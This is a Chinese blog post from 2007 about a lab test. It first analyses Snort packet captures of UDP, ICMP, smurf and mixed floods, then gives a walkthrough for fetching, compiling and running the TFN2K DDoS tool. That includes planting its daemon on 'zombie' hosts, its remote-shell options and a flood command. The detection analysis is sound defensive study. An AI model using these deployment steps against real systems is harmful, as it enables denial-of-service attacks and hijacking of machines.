Chinaunix首页 | 论坛 | 博客
  • 博客访问: 711095
  • 博文数量: 160
  • 博客积分: 8847
  • 博客等级: 中将
  • 技术积分: 1656
  • 用 户 组: 普通用户
  • 注册时间: 2010-11-25 16:46
个人简介

。。。。。。。。。。。。。。。。。。。。。。

文章分类

全部博文(160)

文章存档

2015年(1)

2013年(1)

2012年(4)

2011年(26)

2010年(14)

2009年(36)

2008年(38)

2007年(39)

2006年(1)

分类: 网络与安全

2007-02-09 14:30:13

22)数据包分析:

我通过tfn2k的服务器端攻击10.5.3.61时,根据snort截获的数据包,分析如下:

UDP flood

数据包特征:

1)很多不同的IP(伪造的)向同一台服务器发送数据包,不管是哪个国家的都有;

2)数据包的长度很小;

3)类型:type:0x800

5IpLen:20--很整齐

6DgmLen:29--很整齐

7TTL在不断变化,且大部分不是3264128

8)没有ackwin信息

9)以下为截获的数据包样本:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


IP Len field is 17 bytes smaller than captured length.

(ip.len: 29, cap.len: 46)

08/10-13:28:56.271396 200.14.100.0:18548 -> 10.5.3.61:46988

UDP TTL:250 TOS:0x0 ID:47561 IpLen:20 DgmLen:29

Len: 1

00 .


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


IP Len field is 17 bytes smaller than captured length.

(ip.len: 29, cap.len: 46)

08/10-13:28:56.271414 170.105.35.0:8488 -> 10.5.3.61:57048

UDP TTL:219 TOS:0x0 ID:36174 IpLen:20 DgmLen:29

Len: 1

00 .


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


IP Len field is 17 bytes smaller than captured length.

(ip.len: 29, cap.len: 46)

08/10-13:28:56.271431 62.221.51.0:8487 -> 10.5.3.61:57049

UDP TTL:239 TOS:0x0 ID:17909 IpLen:20 DgmLen:29

Len: 1

00 .


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



ICMP/ping flood:

数据包特征:

1)很多不同的IP(伪造的)向同一台服务器发送数据包,不管是哪个国家的都有;

2)数据包长度很小;

3)类型:type:0x800

4IpLen:20--很整齐

5DgmLen:40--很整齐

7TTL在不断变化,且大部分不是3264128

8)没有ack信息,没有win信息;

9)以下为包的样本:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-12:47:32.874702 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C

234.50.102.0:0 -> 10.5.3.61:0 TCP TTL:245 TOS:0x0 ID:50973 IpLen:20 DgmLen:40

6A 0A 59 FC 00 4A A0 5F DE DD 00 00 00 22 47 AD j.Y..J._....."G.

F6 C7 17 40 ...@



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-12:47:32.878999 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C

254.16.58.0:0 -> 10.5.3.61:0 TCP TTL:238 TOS:0x0 ID:42459 IpLen:20 DgmLen:40

4A FC 94 7D 00 72 17 AB 4A 16 00 00 00 22 20 8C J..}.r..J...." .

64 5E 13 10 d^..



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-12:47:32.880967 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C

215.14.60.0:0 -> 10.5.3.61:0 TCP TTL:233 TOS:0x0 ID:64864 IpLen:20 DgmLen:40

E8 81 8E A3 00 5A 10 33 73 62 00 00 00 22 62 11 .....Z.3sb..."b.

5E 2E F0 CF ^...



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-12:47:32.881591 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C

91.221.178.0:0 -> 10.5.3.61:0 TCP TTL:245 TOS:0x0 ID:27528 IpLen:20 DgmLen:40

ED E3 9B 23 00 27 9E 63 E2 B3 00 00 00 22 3B A8 ...#.'.c.....";.

69 EC 87 53 i..S



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-12:47:32.882127 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C

102.17.176.0:0 -> 10.5.3.61:0 TCP TTL:204 TOS:0x0 ID:12197 IpLen:20 DgmLen:40

CE 3C A2 34 00 7C E2 D0 D1 F3 00 00 00 22 C9 68 .<.4.|.......".h

C4 E9 DF D8

....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



ICMP/smurf flood

数据包特征:

1)很多不同的IP(伪造的)向同一台服务器发送数据包,不管是哪个国家的都有;

2)数据包长度很小;

3)类型:type:0x800

4IpLen:20--很整齐

5DgmLen:40--很整齐

7TTL在不断变化,且大部分不是3264128

8)没有ack信息,没有win信息,但是被攻击主机有返回信息给伪造的ip

返回信息:中包含:

Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED

ORIGINAL DATAGRAM DUMP


9)以下为包的样本:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-14:30:59.386406 74.34.80.0:0 -> 10.5.3.61:0

TCP TTL:252 TOS:0x0 ID:28966 IpLen:20 DgmLen:40

F7 FF BF 1F 00 00 DF F9 57 C1 00 00 00 22 8A EF ........W...."..

10 C5 13 BC ....



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-14:30:59.386425 10.5.3.61 -> 74.34.80.0

ICMP TTL:255 TOS:0xC0 ID:25670 IpLen:20 DgmLen:68

Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED

** ORIGINAL DATAGRAM DUMP:

74.34.80.0:63487 -> 10.5.3.61:48927

TCP TTL:252 TOS:0x0 ID:28966 IpLen:20 DgmLen:40

**U***S* Seq: 0xDFF9 Ack: 0x57C10000 Win: 0x8AEF TcpLen: 0

** END OF DUMP

00 00 00 00 45 00 00 28 71 26 00 00 FC 06 A6 45 ....E..(q&.....E

4A 22 50 00 0A 05 03 3D F7 FF BF 1F 00 00 DF F9 J"P....=........

57 C1 00 00 00 22 8A EF 10 C5 13 BC W...."......


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-14:30:59.386431 79.18.229.0:0 -> 10.5.3.61:0

TCP TTL:212 TOS:0x0 ID:22910 IpLen:20 DgmLen:40

45 D5 37 43 00 16 79 95 AE CA 00 00 00 22 4E 6B E.7C..y......"Nk

80 24 CF E4 .$..



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-14:30:59.386450 10.5.3.61 -> 79.18.229.0

ICMP TTL:255 TOS:0xC0 ID:47289 IpLen:20 DgmLen:68

Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED

** ORIGINAL DATAGRAM DUMP:

79.18.229.0:17877 -> 10.5.3.61:14147

TCP TTL:212 TOS:0x0 ID:22910 IpLen:20 DgmLen:40

**U***S* Seq: 0x167995 Ack: 0xAECA0000 Win: 0x4E6B TcpLen: 0

** END OF DUMP

00 00 00 00 45 00 00 28 59 7E 00 00 D4 06 4B FD ....E..(Y~....K.

4F 12 E5 00 0A 05 03 3D 45 D5 37 43 00 16 79 95 O......=E.7C..y.

AE CA 00 00 00 22 4E 6B 80 24 CF E4 ....."Nk.$..


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


MIX floodUDP/TCP/ICMP

数据包特征:

1)很多不同的IP(伪造的)向同一台服务器发送数据包,不管是哪个国家的都有;

2)数据包长度很小;

3)类型:type:0x800

4IpLen:20--很整齐

5DgmLen:40--很整齐

7TTL在不断变化,且大部分不是3264128

8)各种攻击混和在一起,但是各种攻击数据包的特征仍然可以看到

9)混和攻击的样本:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


IP Len field is 17 bytes smaller than captured length.

(ip.len: 29, cap.len: 46)

08/10-14:47:16.467838 233.55.241.0:43266 -> 10.5.3.61:22270

UDP TTL:251 TOS:0x0 ID:32450 IpLen:20 DgmLen:29

Len: 1

00 .


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


//很明显,第一个是UDP攻击包


IP Len field is 10 bytes bigger than captured length.

(ip.len: 92, cap.len: 82)

08/10-14:47:16.467956 80.20.134.0 -> 10.5.3.61

ICMP TTL:0 TOS:0x0 ID:14790 IpLen:20 DgmLen:92

Type:8 Code:0 ID:0 Seq:0 ECHO

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 ......


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


//第二个是ICMP攻击包


IP Len field is 10 bytes bigger than captured length.

(ip.len: 92, cap.len: 82)

08/10-14:47:16.467979 10.5.3.61 -> 80.20.134.0

ICMP TTL:64 TOS:0x0 ID:29580 IpLen:20 DgmLen:92

Type:0 Code:0 ID:0 Seq:0 ECHO REPLY

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 ......


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


//第三个是正常的包,是10.5.3.61这个服务器返回给伪造IP段的ICMP


IP Len field is 6 bytes smaller than captured length.

(ip.len: 40, cap.len: 46)

TCP Data Offset (0) < hlen (0)

08/10-14:47:16.468008 192.27.108.0:0 -> 10.5.3.61:0

TCP TTL:231 TOS:0x0 ID:49300 IpLen:20 DgmLen:40

39 0A 84 E1 00 D0 09 8C F0 78 00 00 00 22 9E D4 9........x..."..

BB 33 BF 1A .3..


//第四个是ICMP/smurf攻击包


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-14:47:16.468029 10.5.3.61 -> 192.27.108.0

ICMP TTL:255 TOS:0xC0 ID:33351 IpLen:20 DgmLen:68

Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED

** ORIGINAL DATAGRAM DUMP:

192.27.108.0:14602 -> 10.5.3.61:34017

TCP TTL:231 TOS:0x0 ID:49300 IpLen:20 DgmLen:40

**U***S* Seq: 0xD0098C Ack: 0xF0780000 Win: 0x9ED4 TcpLen: 0

** END OF DUMP

00 00 00 00 45 00 00 28 C0 94 00 00 E7 06 D9 DD ....E..(........

C0 1B 6C 00 0A 05 03 3D 39 0A 84 E1 00 D0 09 8C ..l....=9.......

F0 78 00 00 00 22 9E D4 BB 33 BF 1A .x..."...3..


//很明显,是服务器返回smurf攻击服务器的伪造ip


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


IP Len field is 17 bytes smaller than captured length.

(ip.len: 29, cap.len: 46)

08/10-14:47:16.468046 170.37.177.0:59132 -> 10.5.3.61:6404

UDP TTL:232 TOS:0x0 ID:42952 IpLen:20 DgmLen:29

Len: 1

00 .


//又一个UDP攻击包


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-14:47:16.468065 10.5.1.1 -> 10.5.3.61

ICMP TTL:63 TOS:0x0 ID:3040 IpLen:20 DgmLen:56

Type:3 Code:1 DESTINATION UNREACHABLE: HOST UNREACHABLE

** ORIGINAL DATAGRAM DUMP:

10.5.3.61 -> 144.148.52.0

ICMP TTL:63 TOS:0x0 ID:8935 IpLen:20 DgmLen:92

** END OF DUMP

00 00 00 00 45 00 00 5C 22 E7 00 00 3F 01 86 E4 ....E..\"...?...

0A 05 03 3D 90 94 34 00 00 00 FF FF 00 00 00 00 ...=..4.........

//这是一个正常的包,是网关10.5.1.1返回给被攻击服务器,说攻击你返回给网段144.148.52.0不可到达,当然

不可达到了,伪造的嘛,呵呵!!



=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


IP Len field is 6 bytes smaller than captured length.

(ip.len: 40, cap.len: 46)

TCP Data Offset (0) < hlen (0)

08/10-14:47:16.468070 176.86.184.0:0 -> 10.5.3.61:0

TCP TTL:216 TOS:0x0 ID:43343 IpLen:20 DgmLen:40

67 9D 78 37 00 E8 F3 57 00 79 00 00 00 22 8C 50 g.x7...W.y...".P

B5 0B A6 03 ....


//又一个ICMP/SMURF攻击包


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-14:47:16.468089 10.5.3.61 -> 176.86.184.0

ICMP TTL:255 TOS:0xC0 ID:45684 IpLen:20 DgmLen:68

Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED

** ORIGINAL DATAGRAM DUMP:

176.86.184.0:26525 -> 10.5.3.61:30775

TCP TTL:216 TOS:0x0 ID:43343 IpLen:20 DgmLen:40

**U***S* Seq: 0xE8F357 Ack: 0x790000 Win: 0x8C50 TcpLen: 0

** END OF DUMP

00 00 00 00 45 00 00 28 A9 4F 00 00 D8 06 C3 E7 ....E..(.O......

B0 56 B8 00 0A 05 03 3D 67 9D 78 37 00 E8 F3 57 .V.....=g.x7...W

00 79 00 00 00 22 8C 50 B5 0B A6 03 .y...".P....


//服务器返回给伪造网段的smurf


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


IP Len field is 10 bytes bigger than captured length.

(ip.len: 92, cap.len: 82)

08/10-14:47:16.468104 9.93.55.0 -> 10.5.3.61

ICMP TTL:0 TOS:0x0 ID:7240 IpLen:20 DgmLen:92

Type:8 Code:0 ID:0 Seq:0 ECHO

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

00 00 00 00 00 00 ......

//ICMP/flood攻击包


....省略了,呵呵


这回还有意外收获,发现:


windows系统137端口(NETBIOS Name Service

数据包很整齐,内容相同,样本如下:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-13:02:40.979178 10.5.3.104:137 -> 10.5.3.255:137

UDP TTL:128 TOS:0x0 ID:57912 IpLen:20 DgmLen:78

Len: 50

92 63 01 10 00 01 00 00 00 00 00 00 20 45 4D 45 .c.......... EME

4A 46 47 45 46 45 45 45 50 45 50 46 43 43 4E 44 JFGEFEEEPEPFCCND

47 45 43 45 43 45 43 44 48 44 45 43 41 00 00 20 GECECECDHDECA..

00 01 ..


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-13:02:41.357057 10.5.3.104:137 -> 10.5.3.255:137

UDP TTL:128 TOS:0x0 ID:57913 IpLen:20 DgmLen:78

Len: 50

92 62 01 10 00 01 00 00 00 00 00 00 20 45 4D 45 .b.......... EME

4A 46 47 45 46 45 45 45 50 45 50 46 43 43 4E 44 JFGEFEEEPEPFCCND

47 45 43 45 43 45 43 44 48 44 45 41 41 00 00 20 GECECECDHDEAA..

00 01 ..


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


08/10-13:02:41.357076 10.5.3.104:137 -> 10.5.3.255:137

UDP TTL:128 TOS:0x0 ID:57914 IpLen:20 DgmLen:78

Len: 50

92 63 01 10 00 01 00 00 00 00 00 00 20 45 4D 45 .c.......... EME

4A 46 47 45 46 45 45 45 50 45 50 46 43 43 4E 44 JFGEFEEEPEPFCCND

47 45 43 45 43 45 43 44 48 44 45 43 41 00 00 20 GECECECDHDECA..

00 01 ..


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+




攻击和防御过程:


通过tcpdump获取攻击时候的数据包:

tcpdump -w /tmp/tcpdump.log

通过tcpdump读取攻击时记录的数据包:

tcpdump -r /tmp/tcpdump.log

通过snort分析数据包:

sort -r /tmp/tcpdump.log

对比试验得出的数据包特征得出攻击类型

上面的mix混和攻击分析

根据攻击防范措施抵制攻击以保护服务器

进行中....



--------------------------------------------------------------------------

上面说了那么多攻击,UDP flood/ICMP/ping flood/ICMP SMURF flood/MIX (UDP/ICMP/SMURF flood),

幕后元凶是谁?现在我来说一下鼎鼎大名的tfn2k



简介:

  TFN2k被认为是当今功能最强性能最好的DoS攻击工具,几乎不可能被察觉。作者发布这个工具的出发点

是什么呢?作者向你保证它不会伤害公司或个人。但是它会吓一吓那些不关心系统安全的人,因为现在精

密的工具被不断改善,并且被私人持有,他们许多都是不可预测的。现在是每一个人都清醒的时候了,每

一个人都应该意识到假如他不足够关心他的安全问题,最坏的情形就会发生。

  因此这个程序被设计成大多数的操作系统可以编译,以表明现在的操作系统没有特别安全的,包括

Windows,Solaris,Linux及其他各种unix.


特点描述:

  TFN使用了分布式客户服务器功能,加密技术及其它类的功能,它能被用于控制任意数量的远程机器,

以产生随机匿名的拒绝服务攻击和远程访问。


此版本的新特点包括:

1。功能性增加:

   为分布式执行控制的远程单路命令执行

   对软弱路由器的混合攻击

   对有IP栈弱点的系统发动Targa3攻击

   对许多unix系统和WinNT的兼容性。

2。匿名秘密的客户服务器通讯使用:

   假的源地址

   高级加密

   单路通讯协议

   通过随机IP协议发送消息

   诱骗包


编译和安装:

下载tfn2k的软件包:fetch http://www.xfocus.net/tools/200405/tfn2k.tgz

解压缩:

tar zxvf tfn2k.tgz

我使用的linux AS4,修改一下ip.h文件:

vi /usr/local/src/tfn2k/src/ip.h


1 cd /usr/local/src/

2 ls

3 wget http://www.xfocus.net/tools/200405/tfn2k.tgz

4 ls

5 tar zxvf tfn2k.tgz

6 cd tfn2k/src/

7 make

8 vi ip.h

注释一下这个函数:

/*

struct in_addr

{

unsigned long int s_addr;

};*/

9 make clean

10 make

11 ls

12 chmod 755 ./td

13 chmod 755 ./tfn


好了,编译成功会生成2个以上的文件,我们只用tfntd2个:

td上传到“肉鸡”上,

./td

运行成功,那么肉鸡就听你的指挥了,呵呵。

我的环境是:

4redhat as4 服务器

1freebsd 6.1服务器


其中:

2台模拟肉鸡、一台指挥机(也就是攻击者的控制端)、一台目标机都是as4的和一台IDS服务器是freebsd

肉鸡:

10.5.3.147/24

10.5.3.148/24

已经上传了td并运行了;


指挥机:

10.5.3.96/24

编译成功了tfn2k


目标服务器,老米提供的:

10.5.3.61/24


感谢老米为我辛苦的用tcpdump截获攻击包。

freebsd已经根据上面的安装好了snort 2.6.0 + acid 0.963c

监控的数据可以接受到,我的rules通过:

下载得到。


攻击试验:

在指挥机上执行:

usage: ./tfn

[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.

Uses a random protocol as default

[-D n] Send out n bogus requests for each real one to decoy targets

[-S host/ip] Specify your source IP. Randomly spoofed by default, you need

to use your real IP if you are behind spoof-filtering routers

[-f hostlist] Filename containing a list of hosts with TFN servers to contact

[-h hostname] To contact only a single host running a TFN server

[-i target string] Contains options/targets separated by '@', see below

[-p port] A TCP destination port can be specified for SYN floods

<-c command ID> 0 - Halt all current floods on server(s) immediately

1 - Change IP antispoof-level (evade rfc2267 filtering)

usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)

2 - Change Packet size, usage: -i

3 - Bind root shell to a port, usage: -i

4 - UDP flood, usage: -i victim@victim2@victim3@...

5 - TCP/SYN flood, usage: -i victim@... [-p destination port]

6 - ICMP/PING flood, usage: -i victim@...

7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...

8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...

9 - TARGA3 flood (IP stack penetration), usage: -i victim@...

10 - Blindly execute remote shell command, usage -i command


ok,可以执行的攻击还真不少:

96上执行:

vi ./host.txt

10.5.3.147

10.5.3.148

保存

[root@localhost src]# ./tfn -f host.txt -c 4 -i 10.5.3.61


Protocol : random

Source IP : random

Client input : list

Command : commence udp flood


Password verification:

输入你在编译tfn2k时的密码

Sending out packets: ...

输入正确,那么指挥机96就指挥147148去攻击61

没过几分钟,61就有点受不了了,cpu 100%,负载也逐渐升高,不过不会down,毕竟是

分布式的攻击,2台太少了,多搞两台服务器...

好了,这只是做试验而已...



如果您觉得文章不错,就推荐一下:

推荐

阅读(2130) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~